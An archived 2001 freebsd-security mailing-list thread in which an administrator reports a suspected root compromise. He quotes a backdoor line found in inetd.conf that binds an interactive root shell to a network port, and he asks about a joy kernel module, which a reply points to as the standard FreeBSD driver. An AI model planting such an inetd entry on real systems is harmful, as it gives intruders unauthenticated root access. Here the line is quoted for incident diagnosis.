OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Andrew R. Reiter (arrwatson.org)
Date: Thu Nov 01 2001 - 09:27:03 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    On Thu, 1 Nov 2001, Andrew R. Reiter wrote:

    :man 4 joy

    Though, it could be a coverup :-)

    :
    :On Thu, 1 Nov 2001, Ralph Huntington wrote:
    :
    ::I did find this kernel module, but I have no idea what it is. I presume at
    ::this point that the root shell acquired through inetd was for the purpose
    ::of loading this module. Anyone recognize it? Anyone want it for analysis?
    ::
    ::hoganklink:/etc# ll /usr/bin/joy
    ::-r-xr-xr-x 1 root wheel 100 Jul 4 12:05 /usr/bin/joy
    ::
    ::hoganklink:/etc# cat /usr/bin/joy
    ::#!/bin/sh
    ::# $FreeBSD: src/sys/modules/joy/joy.sh,v 1.5 1999/08/28 00:47:23 peter Exp $
    ::
    ::kldload joy
    ::
    ::
    ::hoganklink:/etc# ll /modules/joy.ko
    ::-r-xr-xr-x 1 root wheel 6755 Jul 4 12:05 /modules/joy.ko
    ::
    ::
    ::On Thu, 1 Nov 2001, Ralph Huntington wrote:
    ::
    ::> I have that sinking feeling. I discovered this line at the end of
    ::> inetd.conf on one of our servers:
    ::>
    ::> dlip stream tcp nowait root /bin/sh sh -i
    ::>
    ::> Looks like a root compromise. Sure enough, telnet'ing to the dlip port
    ::> provides what *looks* like a root shell, but I don't seem to be able to do
    ::> anything with it. Pretty mysterious.
    ::>
    ::> Can anyone offer a clue? Thanks in advance, Ralph
    ::>
    ::>
    ::>
    ::>
    ::> To Unsubscribe: send mail to majordomoFreeBSD.org
    ::> with "unsubscribe freebsd-security" in the body of the message
    ::>
    ::
    ::
    ::To Unsubscribe: send mail to majordomoFreeBSD.org
    ::with "unsubscribe freebsd-security" in the body of the message
    ::
    :
    :*-------------.................................................
    :| Andrew R. Reiter
    :| arrfledge.watson.org
    :| "It requires a very unusual mind
    :| to undertake the analysis of the obvious" -- A.N. Whitehead
    :
    :
    :To Unsubscribe: send mail to majordomoFreeBSD.org
    :with "unsubscribe freebsd-security" in the body of the message
    :

    *-------------.................................................
    | Andrew R. Reiter
    | arrfledge.watson.org
    | "It requires a very unusual mind
    | to undertake the analysis of the obvious" -- A.N. Whitehead

    To Unsubscribe: send mail to majordomoFreeBSD.org
    with "unsubscribe freebsd-security" in the body of the message